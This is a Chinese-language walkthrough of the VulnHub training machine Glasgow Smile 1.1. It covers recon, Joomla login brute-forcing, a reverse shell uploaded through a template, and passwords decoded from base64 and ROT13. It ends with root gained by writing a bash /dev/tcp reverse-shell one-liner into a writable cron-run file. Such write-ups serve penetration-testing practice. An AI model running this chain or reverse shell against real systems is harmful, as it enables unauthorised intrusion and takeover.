GLASGOW SMILE: 1.1

靶機描述

靶機地址：https://download.vulnhub.com/glasgowsmile/GlasgowSmile-v1.1.zip

Description

Title: Glasgow Smile

• Users: 5
• Difficulty Level: Initial Shell (Easy) - Privileges Escalation (Intermediate)
• Hint: Enumeration is the key.

If you are a newbie in Penetration Testing and afraid of OSCP preparation, do not worry. Glasgow Smile is supposed to be a kind of gym for OSCP machines.
The machine is designed to be as real-life as possible. Anyway, You will find also a bunch of ctf style challanges, it's important to have some encryption knowledge.
You need to have enough information about Linux enumeration and encryption for privileges escalation.

ABOUT THE VM:

Just download, extract and load the .vmx file in VMware Workstation (tested on VMware Workstation 15.x.x)
The adapter is currently NAT, networking is configured for DHCP and IP will get assigned automatically

CONTACT:

You can contact me on Hack the box (https://www.hackthebox.eu/profile/232477) or by email (mindsflee@hotmail.com) for hints!

Changelog 2020-06-16 - v1.1 2020-06-15 - v1.0

資訊收集

利用arp-scan -l命令掃描靶機IP

arp-scan -l

使用nmap掃描開放埠

nmap -sV -p- 192.168.75.172

訪問80埠並進行目錄爆破

dirsearch -u http://192.168.75.172/ 

密碼爆破

joomla/administrator是一個後臺登陸頁面

命令：cewl http://192.168.75.172/joomla -m 5 -d 1 -w joomla.txt
-w 寫入當前目錄的檔案中
-d 表示爬取深度，預設是2
-m 表示最小字元長度

生成字典後對joomla登入頁面進行爆破

漏洞利用

找到Extensions->Templates->Templates->Beez3 Details and Files上傳反彈shell

反彈shell

獲得互動式shell

python -c 'import pty; pty.spawn("/bin/bash")'

進入到/var/www發現有一個joomla2的目錄

檢視配置檔案發現資料庫的賬號和密碼

連線資料庫

rob為此虛擬機器的一個使用者，將rob的密碼進行base64解密

???AllIHaveAreNegativeThoughts???

rob連線ssh

使用rob的密碼進行ssh登入

發現一個加密檔案

1. Abnerineedyourhelp檔名斷句分析，Abner I need your help像是一封求助信，開啟後看到經過了某種編碼加密，從一封信的角度來看，對內容做隱藏讓我想到ROT13
2. Howtoberoot聽名字就知道，這應該是提升許可權的一個關鍵點，上面第一個檔案應該給到了提示

解密

線上解密工具：https://gchq.github.io/CyberChef/

abner:I33hope99my0death000makes44more8cents00than0my0life0

abner連線ssh

現在檢視一下三個賬戶剩下的最後一個賬戶penguin，查詢一下有關penguin的資訊

find / -iname *penguin* 2>/dev/null //找屬於penguin的檔案

切換到該目錄進行檢視

將該檔案移動到abner使用者的主目錄下進行解壓，否則沒有許可權

cp /var/www/joomla2/administrator/manifests/files/.dear_penguins.zip ~
//~表示$HOME即使用者根目錄

檢視解壓出來的檔案，嘗試一下最後的密碼是不是penguins的密碼

scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz

提權

利用檔案許可權配置不當進行提權
當某個程序啟動許可權為root，對應檔案編輯許可權為普通使用者時，我們可以利用該問題點進行提權

pspy64

https://github.com/DominicBreuker/pspy

chmod + pspy64
./pspy64

發現隱藏檔案.trash_ol一分鐘執行一次，前面發現這個.trash_old是可以編輯的，那就用他來反彈shell

bash -c 'bash -i >& /dev/tcp/192.168.75.150/7777 0>&1'

一分鐘後，計劃任務程式會自動執行.trash_old，最終獲取root許可權